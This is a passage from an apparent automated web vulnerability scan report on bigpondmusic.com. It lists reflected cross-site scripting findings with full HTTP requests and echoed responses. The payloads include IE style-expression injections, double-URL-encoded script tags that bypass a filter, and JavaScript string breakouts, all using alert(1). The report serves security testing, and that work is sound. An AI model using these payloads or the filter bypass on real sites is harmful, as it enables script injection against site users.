GET /album/taio-cruz/rokstarr2?h=64970803157c97"style%3d"x%3aexpression(alert(1))"d7b1258e9f1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119583


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Taio Cruz - Rokstarr - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/taio-cruz/rokstarr2?h=64970803157c97"style="x:expression(alert(1))"d7b1258e9f1" />
...[SNIP]...

2.143. http://bigpondmusic.com/album/taio-cruz/rokstarr2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/taio-cruz/rokstarr2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f37a"style="x:expression(alert(1))"764939ac8af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/taio-cruz/rokstarr2?7f37a"style%3d"x%3aexpression(alert(1))"764939ac8af=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 119146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Taio Cruz - Rokstarr - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/taio-cruz/rokstarr2?7f37a"style="x:expression(alert(1))"764939ac8af=1" />
...[SNIP]...

2.144. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf was submitted in the REST URL parameter 1. This input was echoed as 61a06"><script>alert(1)</script>fd0cbc868bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album61a06%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88307


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album61a06"><script>alert(1)</script>fd0cbc868bf/tom-petty-and-the-heartbreakers/damn-the-torpedoes2" />
...[SNIP]...

2.145. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66c43'%3bf6bdc372dd0 was submitted in the REST URL parameter 1. This input was echoed as 66c43';f6bdc372dd0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album66c43'%3bf6bdc372dd0/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87915


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album66c43';f6bdc372dd0';
   s.prop4 = 'tom-petty-and-the-heartbreakers';
   s.prop5 = 'damn-the-torpedoes2';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|
...[SNIP]...

2.146. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 was submitted in the h parameter. This input was echoed as 8bdab"style="x:expression(alert(1))"842ee7acee9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style%3d"x%3aexpression(alert(1))"842ee7acee9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Tom Petty And The Heartbreak
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?h=7653777758bdab"style="x:expression(alert(1))"842ee7acee9" />
...[SNIP]...

2.147. http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c37f"style="x:expression(alert(1))"ce276fa3e26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style%3d"x%3aexpression(alert(1))"ce276fa3e26=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 139838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Tom Petty And The Heartbreak
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/tom-petty-and-the-heartbreakers/damn-the-torpedoes2?8c37f"style="x:expression(alert(1))"ce276fa3e26=1" />
...[SNIP]...

2.148. http://bigpondmusic.com/album/uriah-heep/the-collection91 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1 was submitted in the REST URL parameter 1. This input was echoed as 4fd5c"><script>alert(1)</script>4ad0e09dbc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album4fd5c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ad0e09dbc1/uriah-heep/the-collection91 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album4fd5c"><script>alert(1)</script>4ad0e09dbc1/uriah-heep/the-collection91" />
...[SNIP]...

2.149. http://bigpondmusic.com/album/uriah-heep/the-collection91 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8ad'%3b2757a09f366 was submitted in the REST URL parameter 1. This input was echoed as 1b8ad';2757a09f366 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album1b8ad'%3b2757a09f366/uriah-heep/the-collection91 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87833


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album1b8ad';2757a09f366';
   s.prop4 = 'uriah-heep';
   s.prop5 = 'the-collection91';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.150. http://bigpondmusic.com/album/uriah-heep/the-collection91 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 was submitted in the h parameter. This input was echoed as a909e"style="x:expression(alert(1))"8131f1c8632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/uriah-heep/the-collection91?h=624650163a909e"style%3d"x%3aexpression(alert(1))"8131f1c8632 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 127967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Uriah Heep - The Collection
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/uriah-heep/the-collection91?h=624650163a909e"style="x:expression(alert(1))"8131f1c8632" />
...[SNIP]...

2.151. http://bigpondmusic.com/album/uriah-heep/the-collection91 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/uriah-heep/the-collection91

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc95e"style="x:expression(alert(1))"7a852546fd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/uriah-heep/the-collection91?bc95e"style%3d"x%3aexpression(alert(1))"7a852546fd8=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:25:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 127948


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Uriah Heep - The Collection
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/uriah-heep/the-collection91?bc95e"style="x:expression(alert(1))"7a852546fd8=1" />
...[SNIP]...

2.152. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1289'%3be26bc6beb3c was submitted in the REST URL parameter 1. This input was echoed as a1289';e26bc6beb3c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albuma1289'%3be26bc6beb3c/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88032


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albuma1289';e26bc6beb3c';
   s.prop4 = 'various-artists';
   s.prop5 = 'he-will-have-his-way-the-songs-of-tim-neil-finn';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1=
...[SNIP]...

2.153. http://bigpondmusic.com/album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902 was submitted in the REST URL parameter 1. This input was echoed as 1bc4c"><script>alert(1)</script>852e427d902 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album1bc4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e852e427d902/various-artists/he-will-have-his-way-the-songs-of-tim-neil-finn HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:18:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
